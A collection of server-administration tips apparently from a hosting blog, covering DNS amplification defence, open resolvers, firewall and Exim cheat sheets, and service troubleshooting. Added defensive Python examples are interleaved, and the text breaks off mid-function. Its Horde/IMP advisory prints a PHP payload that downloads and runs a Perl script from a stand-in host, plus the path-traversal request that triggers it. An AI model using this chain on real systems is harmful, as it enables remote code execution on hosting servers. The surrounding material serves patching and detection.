Protect your server from DDoS attacks – Part 2 !!

We have been talking about DDoS attacks directed at the web-server all this
while  ( http://letushare.com/protect-your-server-from-ddos-attacks )

Another headache is when these attacks are directed at our DNS services; this is
often called a DNS amplification attack.

In simple words, the attack can be explained as follows:

Someone asks you how to reach a particular destination. You are not sure of the location either, so you ask the friends nearest to you, and if you don't get an answer from them you are determined to get one somehow, so you keep inquiring further until you do. (Basically, you do not know this 'someone' who requested your help.)

And this 'someone' has not stopped there. He has asked the same question of
many other people who, like you, are determined to get an answer. He concludes
by saying: if you get an answer, please ring me at 111, a fake number belonging to
some unknown poor guy.

Similarly, an attacker spoofs the source IP address (he spoofs it to the IP he wants to
DDoS, called the target, like the fake number 111) and sends a request to your DNS server asking it to resolve a domain. Your DNS server has no details about that domain in its local database, so it goes around the internet trying to resolve it, and as the attacker sends more and more queries, the request and reply traffic grows beyond any reasonable limit.

Now, remember your server might be one of 10,000 servers whose replies the attacker directs at a target (if the source IP of the DNS query was spoofed to the target's IP).

So basically, this sort of DDoS attack affects not only the 'target' but also all the
DNS servers participating in the attack, as they are flooded with queries (requests and replies).

Attackers will typically submit a request for as much zone information as possible to maximize the amplification effect. In most attacks of this type, the spoofed queries sent by the attacker are of type "ANY", which returns all known information about a DNS zone in a single request. Because the size of the response is considerably larger than the request, the attacker is able to multiply the amount of traffic generated by these DNS services, and in the end the amount of traffic directed at the target is huge.

So, how can we prevent this from happening ?

Going back to our previous illustration, when that 'someone' asked you for help,
it was you who sought out an answer. You could have said:

"I'm sorry, I don't know the route to that destination. Neither do I know you, so I can't spend
my time/energy assisting you."

This is where you can make your DNS server a closed resolver.

More on this is found at the page, http://letushare.com/169/

And consider this: even if your DNS server is closed, it would still receive the
queries from the attacker and would have to reply to them; it is just that it is no
longer a part of the attack. Even these replies might hinder your services if too
many requests are directed at your server.

Here you can use iptables to set a rate-limit on the queries reaching your DNS port.

First make sure the recent module (xt_recent, ipt_recent on older kernels) is loaded on the server;
this module is needed to get this particular aspect of iptables working.

The first rule moves all packets received on UDP port 53 to a new chain:


# iptables -N block                          ( create a new chain )
# iptables -A INPUT -p udp --dport 53 -j block

Then,

# iptables -A block -m recent --set --name DNSQF --rsource
( create a recent list named DNSQF that records the source IP of each packet )

# iptables -A block -m recent --update --seconds 5 --hitcount 15 --name DNSQF --rsource -j DROP
( check the packet against the DNSQF list of recent source IPs and drop it when the limit is exceeded )

The above rule drops every packet after the 15th one received from the same source IP within a 5-second time frame. Since the limit is tracked per source address, it helps against a single noisy source; queries spoofed from many different addresses each stay under the limit.

Applying these rules in iptables can help reduce the traffic reaching your server
when DNS queries are made to it, even when it is a closed resolver.

MySQL server not starting ?

There are tons of causes for which MySQL might not start,
ranging from a full disk to corrupt databases.

The first place to check for a clue is the .err log
( /var/lib/mysql/hostname.err )

If the error corresponds to something like this:

InnoDB: End of page dump
140104 12:33:19 InnoDB: Page checksum 2288969011, prior-to-4.0.14-form checksum 2949853821
InnoDB: stored checksum 492713095, prior-to-4.0.14-form stored checksum 2949853821
InnoDB: Page lsn 0 40542, low 4 bytes of lsn at page end 40542
InnoDB: Page number (if stored to page already) 47,
InnoDB: space id (if created with >= MySQL-4.1.1 and stored already) 0
InnoDB: Page may be an update undo log page
InnoDB: Page may be an index page where index id is 12
InnoDB: Also the page in the doublewrite buffer is corrupt.
InnoDB: Cannot continue operation.
InnoDB: You can try to recover the database with the my.cnf
InnoDB: option:
InnoDB: innodb_force_recovery=6

One reason for this error is the use of multiple
storage engines, MyISAM and InnoDB, at the same time.

Check your /etc/my.cnf for any lines which highlight the use
of multiple storage engines.

The following can be an example:

innodb_force_recovery=4
default-storage-engine=MyISAM

The above configuration implies that MyISAM is the default
storage engine, but another InnoDB-related setting is
also given, which conflicts.

If your default storage engine is MyISAM, then
adding the following option to /etc/my.cnf would
help: skip-innodb

Apache error — No space left on device: Couldn’t create accept lock

Apache: [emerg] (28)No space left on device: Couldn’t create accept lock

[notice] suEXEC mechanism enabled (wrapper: /usr/local/apache/bin/suexec)
[crit] (28)No space left on device: mod_rewrite: Parent could not create RewriteLock file /usr/local/apache/logs/rewrite_lock

semget: [emerg] (28) No space left on device OR Apache: No space left on device: Couldn’t create accept lock

You might check whether the disk is full, and can easily confirm that this is not the reason for the error.

The reason behind the error message is semaphores: Apache could not obtain one. You will have to remove the hung/stuck semaphore arrays in order to get Apache running again.

To list the active semaphore arrays, execute:

# ipcs -s

------ Semaphore Arrays --------
key        semid      owner      perms      nsems
0x00000000 366673220  apache     600        1
0x00000000 366706589  apache     600        1
0x00000000 366732358  apache     600        1
0x00000000 366734353  apache     600        1

To remove those arrays, use the following command, where semid is the value from the second column of the ipcs output (it is a semaphore id, not a process id):

# ipcrm -s <semid>

Once those stale semaphore arrays are cleared, restart your Apache service.


A cPanel bug ( for version — 11.40 ) with clamAV

Getting the following error message ?

===========

Original Message --------
Subject: Cron /usr/local/cpanel/3rdparty/bin/freshclam --quiet --no-warnings
From: (Cron Daemon)
To: root@hostname
Date: 12/12/2013 04:38
> ERROR: Can't create temporary directory

/usr/local/cpanel/3rdparty/share/clamav/clamav-xxxxx.tmp

===========

This is a known issue/bug with cPanel 11.40.

Although the directory '/usr/local/cpanel/3rdparty/share/clamav'
has sufficient permissions and the correct ownership configured, freshclam
is not able to create the required files/folders in it.

A temporary workaround for this issue is to change the ownership of
the directory as shown below:

==========

chown clamav:clamav /usr/local/cpanel/3rdparty/share/clamav

==========

A vulnerability with older versions of Horde/IMP in Plesk !

The Horde/IMP package (3.1.7-3.3.2) shipped with Plesk 8.x and with earlier versions of 9.x (before 9.5.4) has a vulnerability that allows an attacker to run malicious code: the attacker submits a login to the webmail via a POST request to the /horde/imp/redirect.php file, with PHP code as the username. For example:

<?php passthru("cd /tmp;curl -O -s http://domain.tld/new.txt;
perl new.txt;rm -rf new.txt"); ?>

This results in the PHP code being logged to the /var/log/psa-horde/psa-horde.log file, which, due to a vulnerability in the barcode.php file, allows attackers to cause Horde to execute the code by making this request:

/horde/util/barcode.php?type=../../../../../../../../../../../var/log/psa-horde/psa-horde.log

Here is what the attacker's actual requests and the corresponding entries in the psa-horde.log
file would look like:

xx.xx.xx.xx - - [17/Jan/2012:08:01:19 -0500] "POST /horde/imp/redirect.php HTTP/1.1" 302 - "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5"

xx.xx.xx.xx - - [17/Jan/2012:08:01:35 -0500] " /horde/util/barcode.php?

Resolution

The resolution suggested by Parallels is to download the patch for Horde and place it in
/usr/share/psa-horde/lib/Horde/

The patch can be obtained from:

http://kb.parallels.com/Attachments/19039/Attachments/patch%20Horde%203.1.7.zip
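As an added, defensive example (not part of the original post), the following scans Apache access-log lines for the two requests described above: a POST to /horde/imp/redirect.php followed by a request to /horde/util/barcode.php whose type parameter contains a ../ traversal (also when percent-encoded), so an administrator can tell from the logs whether an unpatched Horde install has been probed. The log lines are constructed and use documentation IP addresses.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Common/combined log format: ip ident user [time] "METHOD target PROTO" status ...
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3})')

REDIRECT_PATH = "/horde/imp/redirect.php"
BARCODE_PATH = "/horde/util/barcode.php"

# Constructed sample: the chain from the post, a legitimate barcode request,
# a double-encoded traversal, and an unrelated login page hit.
SAMPLE_LOG = """\
198.51.100.23 - - [17/Jan/2012:08:01:19 -0500] "POST /horde/imp/redirect.php HTTP/1.1" 302 - "-" "Mozilla/5.0"
198.51.100.23 - - [17/Jan/2012:08:01:35 -0500] "GET /horde/util/barcode.php?type=../../../../var/log/psa-horde/psa-horde.log HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.5 - - [17/Jan/2012:09:00:00 -0500] "GET /horde/util/barcode.php?type=code128&text=123 HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
203.0.113.5 - - [17/Jan/2012:09:00:01 -0500] "GET /horde/util/barcode.php?type=%252e%252e%252fvar%252flog%252fpsa-horde%252fpsa-horde.log HTTP/1.1" 200 300 "-" "curl/7.19"
192.0.2.44 - - [17/Jan/2012:09:05:00 -0500] "GET /horde/login.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""


def parse_access_line(line):
    """Split one access-log line into its fields, or return None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, ts, method, target, status = m.groups()
    return {"ip": ip, "ts": ts, "method": method, "target": target, "status": int(status)}


def barcode_traversal(target):
    """True when a barcode.php request carries '../' in its type parameter.
    parse_qs decodes one level of percent-encoding; unquote catches a second level."""
    parts = urlsplit(target)
    if parts.path != BARCODE_PATH:
        return False
    return any("../" in unquote(v) for v in parse_qs(parts.query).get("type", []))


def find_horde_abuse(lines):
    """Return {ip: {"redirect_post": bool, "traversals": n}} for every client that
    requested barcode.php with a traversal. redirect_post records whether that client
    had earlier POSTed to redirect.php, i.e. the full chain the post describes."""
    posted = set()
    report = {}
    for line in lines:
        req = parse_access_line(line)
        if req is None:
            continue
        if req["method"] == "POST" and urlsplit(req["target"]).path == REDIRECT_PATH:
            posted.add(req["ip"])
        elif barcode_traversal(req["target"]):
            entry = report.setdefault(req["ip"], {"redirect_post": False, "traversals": 0})
            entry["traversals"] += 1
            entry["redirect_post"] = entry["redirect_post"] or req["ip"] in posted
    return report


if __name__ == "__main__":
    for ip, info in find_horde_abuse(SAMPLE_LOG.splitlines()).items():
        stage = "full chain (redirect.php POST seen)" if info["redirect_post"] else "traversal only"
        print(f"{ip}: {info['traversals']} traversal request(s), {stage}")
```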

Open resolvers !!

What is an open resolver?

Before getting to know what an open resolver is, you need to know what
recursion, i.e. recursive queries, means.

Suppose you have a DNS server configured, and a local machine which uses
your DNS server queries for a website. Imagine this query is a new one
and it is not in the local cache of the machine which made the request.
Once the request reaches your DNS server, it will attempt to find the
website in question in its local cache. If it cannot find an answer it
will query other DNS servers on your behalf until it finds the address.
It will then respond to the original request with the results from each
server's query.

This scenario is fine, because the local machine which made the initial
request is trusted by you.

What if another machine, which isn't trusted by you, queries your DNS server
for the same? Then your DNS server is an open resolver.

An open DNS resolver is a name server that provides recursive name resolution
for non-local clients or users. Basically it's a name server that provides recursive
replies for every system on the internet. Local users or "authorized" clients are
users on networks that you control and/or that you trust. Recursive replies are
the result of following the chain of delegations found in DNS, ending up at the
domain name that was requested by the original user.

Open DNS resolvers are frequently abused to conduct efficient DDoS attacks against
websites, infrastructure and services. In a DNS amplification DDoS attack, the attacker
sends a DNS name lookup request to an open DNS resolver with the source address
spoofed to be the victim's address.

When the DNS server sends the DNS record response, it is sent
to the victim (the source address that was used in the spoofed request). Because the size
of the response is typically considerably larger than the request, the attacker is able to
amplify the volume of traffic directed at the victim. Don't think it would affect just the
victim. Essentially this means that your equipment is taking part in a botnet leveraging
a DDoS attack against other systems, potentially causing disruption of services and harm.

If your systems take part in such a DDoS attack then your own network, server and services
infrastructure too can easily become congested.

To get around this issue, configure your DNS server to either disable recursion or
allow recursion only from a trusted set of IPs.

Recursion can be disabled by adding the following to the options block of your /etc/named.conf file:

options {
    recursion no;
};

You can allow recursion from a trusted set of IPs by giving the following:

options {
    // include your server IPs, your provider's nameserver IPs
    // and whichever IPs you feel can be trusted
    allow-recursion { 127.0.0.1; IP1; IP2; };
};

Suppose you have a DNS server and you have configured named with

allow-recursion { IP1; IP2; };

Try the following from the machine with IP1,

# nslookup google.com x.x.x.x    ( x.x.x.x is the DNS server IP )

The result would be :

———–

(root) nameserver = J.ROOT-SERVERS.NET
(root) nameserver = K.ROOT-SERVERS.NET
(root) nameserver = L.ROOT-SERVERS.NET
(root) nameserver = M.ROOT-SERVERS.NET
(root) nameserver = A.ROOT-SERVERS.NET
(root) nameserver = B.ROOT-SERVERS.NET
(root) nameserver = C.ROOT-SERVERS.NET
(root) nameserver = D.ROOT-SERVERS.NET
(root) nameserver = E.ROOT-SERVERS.NET
(root) nameserver = F.ROOT-SERVERS.NET
(root) nameserver = G.ROOT-SERVERS.NET
(root) nameserver = H.ROOT-SERVERS.NET
(root) nameserver = I.ROOT-SERVERS.NET

...

———–

Suppose you make the same query from an IP which is not
listed in allow-recursion; then you get the following:

———-

Server: x.x.x.x
Address: x.x.x.x#53

** server can’t find google.com: REFUSED

———-

So, consider tweaking your DNS server if it is an open resolver!
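As an added example (not from the original post), here is the nslookup test above done by hand with a raw UDP query, so the outcome can be read straight from the DNS response header: RCODE 5 (REFUSED) means the client is outside allow-recursion, while an RA (recursion available) bit set to 1 means the server is willing to recurse for that client. check_resolver() needs network access; every other function works offline on constructed bytes.

```python
import socket
import struct

FLAG_QR = 0x8000     # message is a response
FLAG_RD = 0x0100     # recursion desired
FLAG_RA = 0x0080     # recursion available
RCODE_MASK = 0x000F  # low 4 bits of the flags word
RCODE_REFUSED = 5


def build_query(qname, qid=0x1234, qtype=1):
    """Standard query for qname (default A record) with RD=1, as nslookup sends."""
    header = struct.pack("!HHHHHH", qid, FLAG_RD, 1, 0, 0, 0)
    labels = b"".join(bytes([len(l)]) + l.encode("ascii") for l in qname.strip(".").split("."))
    return header + labels + b"\x00" + struct.pack("!HH", qtype, 1)   # QTYPE, QCLASS IN


def parse_header(data):
    """Decode the 12-byte DNS header into the fields the check needs."""
    qid, flags, _qd, an, _ns, _ar = struct.unpack("!HHHHHH", data[:12])
    return {"id": qid, "qr": bool(flags & FLAG_QR), "rd": bool(flags & FLAG_RD),
            "ra": bool(flags & FLAG_RA), "rcode": flags & RCODE_MASK, "ancount": an}


def classify(response, expected_id):
    """Map a response header to what it says about recursion for this client."""
    if len(response) < 12:
        return "malformed"
    h = parse_header(response)
    if h["id"] != expected_id or not h["qr"]:
        return "mismatch"
    if h["rcode"] == RCODE_REFUSED:
        return "refused"               # client is outside allow-recursion
    if h["ra"]:
        return "recursion-available"   # server recurses for us: open if we are untrusted
    return "no-recursion"              # RA clear, e.g. "recursion no;" or authoritative-only


def make_response(qid, flags, ancount=0):
    """Constructed response header for offline testing (no answer section appended)."""
    return struct.pack("!HHHHHH", qid, flags, 1, ancount, 0, 0)


def check_resolver(server, qname="google.com", timeout=3.0):
    """Send the query to server:53 over UDP and classify the reply (needs network)."""
    qid = 0x1234
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        s.sendto(build_query(qname, qid), (server, 53))
        try:
            data, _ = s.recvfrom(512)
        except socket.timeout:
            return "timeout"
    return classify(data, qid)
```

Run check_resolver() once from a trusted IP and once from an untrusted one; the trusted client should see "recursion-available" and the untrusted one "refused" or "no-recursion".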

csf & iptables cheatsheet !!

CSF

csf -a   : allow an IP and add it to /etc/csf.allow
csf -ar  : remove an IP from /etc/csf.allow and delete the rule
csf -d   : deny an IP and add it to /etc/csf.deny
csf -dr  : unblock an IP and remove it from /etc/csf.deny
csf -g   : search the list and show the rule that matches the IP
csf -tr  : remove the IP from the temporary ban
csf -x   : disable csf and lfd
csf -e   : enable csf and lfd if disabled
csf -r   : restart csf

CSF config files

  • /etc/csf/csf.conf     :csf config file
  • /etc/csf/csf.allow    :csf allow file
  • /etc/csf/csf.deny     :csf deny file
  • /etc/csf/csf.ignore   :ignore list file ( the IPs lfd should ignore and not block )
  • /etc/csf/csf.tempban  :to see the ips in temporary ban

To block an entire range of IPs from a country

Open the CSF config file, look for the line "CC_DENY" and add the corresponding country code.

For example, to block IPs from China, add the country code 'CN'.

IPTABLES

service iptables status : display the status of the firewall
iptables -F : flush all rules
iptables -L INPUT -n : list the rules of the INPUT chain (numeric output)
iptables -I INPUT -s x.x.x.x -j DROP   : block a single IP address
iptables -D INPUT -s x.x.x.x -j DROP   : delete that rule again
iptables -A INPUT -s x.x.x.x -j ACCEPT : allow all traffic from the IP address
iptables -A INPUT -p tcp --dport 3306 -j DROP : block a port from all IPs
iptables -A INPUT -p tcp -s x.x.x.x --dport 3306 -j ACCEPT : allow a port from a single IP
iptables -A INPUT -m mac --mac-source 00:0F:EA:91:04:08 -j DROP : block traffic from a MAC address

Difference between DROP and REJECT: REJECT works like DROP, but also returns an error
message to the host sending the packet, telling it that the packet was blocked.

iptables-save > /root/rule.file : save the iptables rules to an external file
iptables-restore < /root/rule.file : restore the rules from that file

iptables -L INPUT --line-numbers : To list the rules along with the rule
number in the chain 'INPUT'
iptables -D INPUT 1 : To delete the rule 1 in the chain INPUT

Passive mode FTP !

Enable the passive port range for Pure-FTPd !!

Before that, an overview of different modes for an FTP connection.

File Transfer Protocol (FTP) has two modes you can use for an FTP connection: active and passive. In active mode, the FTP server responds to the client's connection attempt by opening a data connection back to the FTP client from a different port. FTP's passive mode lets the FTP client initiate both connections.

Now, to enable passive mode and its range,

* Open the /etc/pure-ftpd.conf configuration file in your preferred text editor.
* Remove the comment (#) from the beginning of the line which contains the PassivePortRange option.
* Change that line to the following:

PassivePortRange 49152 65534 ( indicate the range here )

* Save the changes to the configuration file.
* Run the /usr/local/cpanel/scripts/restartsrv_ftpserver command to restart the server.

Remember to open these ports in the firewall.

Options +Includes — what is it ?

What is the option seen as Options +Includes?

SSI (Server Side Includes) are directives that are placed in HTML pages, and evaluated on the
server while the pages are being served. They let you add dynamically generated content to an existing HTML page, without having to serve the entire page via a CGI program, or other dynamic technology.

The decision of when to use SSI, and when to have your page entirely generated by some program, is usually a matter of how much of the page is static, and how much needs to be recalculated every time the page is served.

SSI is a great way to add small pieces of information, such as the current time.

To permit SSI on your server, you must have the following directive either in your httpd.conf file, or in a .htaccess file:

Options +Includes

Issue with Apache and SymLinks

The vulnerability with Symlinks and Apache is a known issue
in a shared hosting environment.

The first step employed by the attacker is to find a single compromised website or domain on the server that has a vulnerable script, third-party application or theme. Once he gets access to that single domain, he moves forward by creating symlinks to other websites, or even to / (root).

For example, if the following symlink is set in any domain,

link -> /root

then using the directory 'link' anyone can actually access
/root and read any sensitive file.

Rather than manually creating such symlinks, the attacker can use a
perl/cgi script to create symlinks to the directories of the other users on the server.

As a basic solution for this, you can ensure that Apache is configured in a
way that it does not follow symlinks (Options -FollowSymLinks).

================

To disable the ability for Apache to follow symbolic links in users' requests, remove the FollowSymLinks option from the Options line of your Directory blocks.

For example, if the configuration was:

<Directory "/usr/local/apache/htdocs">
    Options Indexes FollowSymLinks
    AllowOverride None
    Order allow,deny
    Allow from all
</Directory>

Remove the FollowSymLinks reference so that it reads:

<Directory "/usr/local/apache/htdocs">
    Options Indexes
    AllowOverride None
    Order allow,deny
    Allow from all
</Directory>

================

If you really need symlinks, you can use the “SymLinksIfOwnerMatch” option to only
allow links from within the same user.

To prevent PHP from accessing any file outside an account's directory, you need to set the 'open_basedir' setting (in the PHP configuration file) so that each account only has access to its own directory.

This option can be enabled from WHM, but :

==========

This security tweak uses Apache DSO style directives. If PHP is
configured to run as a CGI, SuPHP or
FastCGI process, the open_basedir setting must be manually specified
in the relevant php.ini file.
See the EasyApache documentation for more information.

==========

If the PHP handler is set to CGI or SuPHP, then the tweak settings seen in WHM
cannot be used to set the open_basedir option.

You need to manually specify the open_basedir option in the global
PHP configuration file ( use php -i | grep php.ini to find the php.ini location )

In addition, to prevent this symlink attack there are various patches too:

https://forums.cpanel.net/f185/solutions-handling-symlink-attacks-202242-p4.html#post996441

To be kept in mind: the root cause of this attack or vulnerability is an
unsecured script/plugin/application employed in one of the domains.
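As an added example (not part of the original post), a small audit that walks an account's home directory and reports symlinks that escape it, dangle, or point at files owned by another user, which is the condition Apache's SymLinksIfOwnerMatch enforces before following a link. demo() builds a constructed layout in temporary directories, including a link that escapes the account like the post's 'link -> /root'.

```python
import os
import tempfile


def audit_symlinks(home):
    """Return a finding for every symlink under `home` that (a) escapes `home`,
    (b) is dangling, or (c) has a different owner than its target, which is
    what SymLinksIfOwnerMatch checks before following a link."""
    home = os.path.realpath(home)
    findings = []
    for root, dirs, files in os.walk(home):          # does not descend into linked dirs
        for name in dirs + files:
            path = os.path.join(root, name)
            if not os.path.islink(path):
                continue
            target = os.path.realpath(path)
            if not os.path.exists(target):
                issue = "dangling"
            elif os.path.commonpath([home, target]) != home:
                issue = "outside-home"
            elif os.lstat(path).st_uid != os.stat(target).st_uid:
                issue = "owner-mismatch"
            else:
                continue                              # stays inside the account, same owner
            findings.append({"link": os.path.relpath(path, home), "target": target, "issue": issue})
    return findings


def demo():
    """Constructed layout: an account home with a safe link, a link escaping into
    another account's directory (like the post's `link -> /root`) and a dangling link."""
    other = tempfile.mkdtemp(prefix="other-account-")
    home = tempfile.mkdtemp(prefix="account-")
    with open(os.path.join(home, "index.html"), "w") as f:
        f.write("ok\n")
    with open(os.path.join(other, "wp-config.php"), "w") as f:
        f.write("constructed secret\n")
    os.symlink(os.path.join(home, "index.html"), os.path.join(home, "safe"))
    os.symlink(other, os.path.join(home, "link"))
    os.symlink(os.path.join(home, "missing"), os.path.join(home, "dangling"))
    return sorted((f["link"], f["issue"]) for f in audit_symlinks(home))


if __name__ == "__main__":
    for link, issue in demo():
        print(f"{issue}: {link}")
```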

ip_conntrack: table full, dropping packet !!

Facing an issue with the kernel module, ‘ip_conntrack’ ?

Checking /var/log/messages gives something like this ?

==========

Nov 13 14:45:23 host kernel: ip_conntrack: VPS xxx table full, dropping packet.
Nov 13 14:45:43 host kernel: ip_conntrack: VPS xxx table full, dropping packet.
Nov 13 14:45:48 host kernel: ip_conntrack: VPS xxx table full, dropping packet.

==========

If you run an iptables firewall and have rules that act upon the state of a packet,
the kernel uses ip_conntrack to keep track of the state of each connection so that
the firewall rule logic can be applied to it. If your system gets a lot of network
activity, the table accumulates entries.

* Increase ip_conntrack_max to a higher value by editing /etc/sysctl.conf

Add/edit this line:

net.ipv4.ip_conntrack_max=xxxx

Run # sysctl -p after making the changes.

Check the current value using the command:

# sysctl net.ipv4.netfilter.ip_conntrack_max

( On kernels where the module is nf_conntrack rather than ip_conntrack, the parameter is net.netfilter.nf_conntrack_max instead. )

Don't keep increasing the above value (ip_conntrack_max) beyond a limit if you still see the error after the increase. This error might indicate the start of something more destructive on your server's network, such as a DDoS attack. The number of packets sent/received during this period would be very high, and as a result the kernel module is not able to track them all, which results in the above error.

So check the server traffic using commands like iftop or tcpdump and determine whether the
issue is related to an attack.

Dovecot issue – dovecot.index file broken ?


Is any email user unable to log in via webmail? Does it report a failed
login even if you are a hundred percent sure the credentials are correct?

Check /var/log/maillog.

# tailf /var/log/maillog

If you find anything like this,

=============

Nov 12 20:59:02 host dovecot: imap(zzzz@yyyy.com): Error: Transaction log file /home/xxxx/mail/yyyy.com/zzzz/dovecot.index.log seq 302:
Nov 12 20:59:02 host dovecot: imap(zzzz@yyyy.com): Error: broken sync positions in index file /home/xxxx/mail/yyyy.com/zzzz/dovecot.index
Nov 12 20:59:02 host dovecot: imap(zzzz@yyyy.com): Warning: fscking index file /home/xxxx/mail/yyyy.com/zzzz/dovecot.index
Nov 12 20:59:02 host dovecot: imap(zzzz@yyyy.com) Error: Fixed index file /home/xxxx/mail/yyyy.com/zzzz/dovecot.index log_file_tail_offset 1184 -> 988
Nov 12 20:59:02 host dovecot: imap(zzzz@yyyy.com): Panic: file mail-transaction-log.c: line 350 (mail_transaction_log_set_mailbox_sync_pos): assertion failed: (file_offset >= log->head->saved_tail_offset)

=============

As indicated in the logs, there seems to be an issue with the dovecot index file for the user ‘zzzz’. The basic idea behind Dovecot’s index files is that it makes reading the mailboxes a lot faster.

This happens to be a long-standing issue with Dovecot.

The solution is to delete the dovecot.index file (and its dovecot.index.log) for that mailbox; Dovecot rebuilds the index files from the mailbox on the next access.


Out of memory error in PHP scripts?

Facing the following error when running any PHP scripts ?

=========
PHP Fatal error: Out of memory (allocated xxxxx (tried to allocate xxxx bytes)
=========

Tried increasing the memory limit from php.ini file and still getting the above error ?

Initially, we might think this issue is with the memory_limit setting in the php.ini file.
But if we analyse the error message we get, we can see that the issue is not with
the php.ini configuration settings.

Usually, when a PHP script does not have enough memory to execute itself,
the error message seen is as below :

=========
Fatal error: Allowed memory size of xxxx bytes exhausted (tried to allocate xxxxxx bytes)
=========

In this case, the error seen is not the usual one, which suggests it is not directly related to the PHP configuration.

When we analyse things further, we can see that the real issue lies within
the Apache configuration. Apache has memory limits of its own, set in its configuration
files. This directive is called 'RLimitMEM'.

Explanation of RLimitMEM from the official Apache documentation:

===============

RLimitMEM Directive

It sets the soft resource limit for all processes, and the second parameter sets the maximum resource limit. It indicates to the server that the limit should be set to the maximum allowed by the operating system configuration. Raising the maximum resource limit requires that the server is running as root, or in the initial startup phase.

This applies to processes forked off from Apache children servicing requests, not the Apache children themselves. This includes CGI scripts and SSI exec commands, but not any processes forked off from the Apache parent such as piped logs.

Memory resource limits are expressed in bytes per process.

===========

So, increase this value/limit from your httpd configuration file, to get around this issue.

Want PHP4 and PHP5 in same cPanel server ?


Kindly keep in mind that PHP4 is no longer supported (it was first released in 2000), so this is not recommended unless you absolutely need it. Since it is not supported anymore, it could leave your server more vulnerable than it would be without it.

To install, do the following steps:

* Download the PHP4 custom module for EasyApache from,

http://docs.cpanel.net/twiki/pub/EasyApache/EasyApacheCustomModules/custom_opt_mod-PHP449.tar.gz

* Extract the tarball into the folder /var/cpanel/easy/apache/custom_opt_mods

# tar -C /var/cpanel/easy/apache/custom_opt_mods -zxvf custom_opt_mod-PHP449.tar.gz

* Run EasyApache ( from WHM or # /scripts/easyapache )

* Enable the PHP4.4.9 support module in the short options list.

* Complete the steps of EasyApache

* Verify both PHP versions are present

# php4 -v and # php -v

* Configure Apache to run both versions of PHP:

# /usr/local/cpanel/bin/rebuild_phpconf 5 cgi dso 1
(The syntax is rebuild_phpconf <Default PHP Major Version> <PHP4 Handler> <PHP5 Handler> <Suexec>)

-> So in the above case, PHP5 is the default PHP major version,
CGI is the PHP4 handler, DSO is the PHP5 handler and suexec is enabled.

* If the PHP4 script requires the extension to be .php instead of .php4, you can set the handler for the one site using a .htaccess with the following contents:

AddType application/x-httpd-php4 .php

Exim cheatsheet !!

# cat /var/log/exim_paniclog : info about the exim program itself
# cat /var/log/exim_mainlog : logs every single transaction that the server handles
# cat /var/log/exim_rejectlog : logs delivery rejections
# exim -bp : show mails in the queue
# exim -bpc : count the number of messages in the queue
# exim -bpr : operates like -bp, but the output is not sorted into chronological order of message arrival
# exim -bp | exiqsumm : generate a summary table for all the messages in the queue
# eximstats /var/log/exim_mainlog : display Exim stats using the default log file

==================

# eximstats -ne -nr -nt /path/to/exim_mainlog : more concise info from the log

-ne : don't display error info

-nr : don't display relaying info

-nt : don't display transport info

-bydomain : show results by sending domain

-byemail : show results by sender email address

-byhost : show results by sending host

==================

# fgrep YYYY-MM-DD /path/to/exim_mainlog | eximstats : narrow down Exim stats generation to a particular day

# exiwhat : show what is exim doing at the moment

# exim -bt [user]@domain : test how Exim's configuration will handle mail sent to the specified address

# exiqgrep -f [user]@domain: Find messages from a particular sender in the queue

# exiqgrep -r [user]@domain: Find messages to a particular addressee on your server

# exim -Mrm <message-id> [ <message-id> ... ] : remove specific message(s) from the queue

# exiqgrep -o 36000 -i | xargs exim -Mrm : remove all messages older than ten hours (36000 seconds)

# exiqgrep -y 3600 [...] : use -y to print messages that are younger than the specified number of seconds; for example, messages less than an hour old

# exim -Mvh <message-id> : view a specific message's full headers

# exim -Mvb <message-id> : view a specific message's body

# exim -Mvl <message-id> : view a specific message's Exim log

# exim -qf : Force another queue run

# exim -qff : Force another queue run and attempt to flush frozen messages

# exim -Mar <message ID> "rcpt address" : Add recipient

# exim -Mes <message ID> "to address" : Edit sender

# exim -bv <address> :Verify an address

# exim -bp | grep frozen | wc -l : To check frozen emails in the queue

# exiqgrep -z -i | xargs exim -Mrm : Delete frozen mails

How to customize SpamAssassin!!

SpamAssassin can be configured from cPanel of each domain. It can be customized further by
adding rules or filters.

In order to specify custom rules for a domain, you need to create the file
~/.spamassassin/user_prefs for that domain.

For eg, for the domain letushare.com under the account letushare, you need to create a file /home/letushare/.spamassassin/user_prefs and add the custom rules.

A simple rule:

body LOCAL_DEMONSTRATION_RULE /test/
score LOCAL_DEMONSTRATION_RULE 0.1
describe LOCAL_DEMONSTRATION_RULE Body contains the string test

This rule does a simple case-sensitive search of the body of the email for the string
"test" and adds 0.1 to the score of the email if it finds it. It will match "test"
but also "testing" and "attest". The describe statement contains the text which will
be placed into the verbose report, if verbose reports are used.
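As an added example (not from the original post), a minimal evaluator for body rules of the kind shown above: it parses body/score/describe lines from a user_prefs-style text and scores a message body, so the case-sensitive, substring nature of the match (hitting "testing" and "attest" but not "TEST") can be checked. A second, constructed rule with the /i flag shows the case-insensitive form; SpamAssassin's default score of 1.0 for a rule without a score line is assumed.

```python
import re

# Constructed user_prefs fragment: the post's rule plus a case-insensitive one.
RULES_TEXT = """\
body LOCAL_DEMONSTRATION_RULE /test/
score LOCAL_DEMONSTRATION_RULE 0.1
describe LOCAL_DEMONSTRATION_RULE Body contains the string test
body LOCAL_CI_RULE /free money/i
score LOCAL_CI_RULE 2.5
describe LOCAL_CI_RULE Spammy phrase, matched case-insensitively
"""

BODY_RE = re.compile(r"^/(.*)/([a-z]*)$")   # /pattern/flags


def parse_rules(text):
    """Parse body/score/describe lines into {name: {"regex", "score", "describe"}}."""
    rules = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, 2)
        if len(parts) < 2:
            continue
        kind, name = parts[0], parts[1]
        rest = parts[2] if len(parts) == 3 else ""
        rule = rules.setdefault(name, {"regex": None, "score": 1.0, "describe": ""})
        if kind == "body":
            m = BODY_RE.match(rest)
            if not m:
                raise ValueError(f"bad body pattern for {name}: {rest}")
            flags = re.IGNORECASE if "i" in m.group(2) else 0
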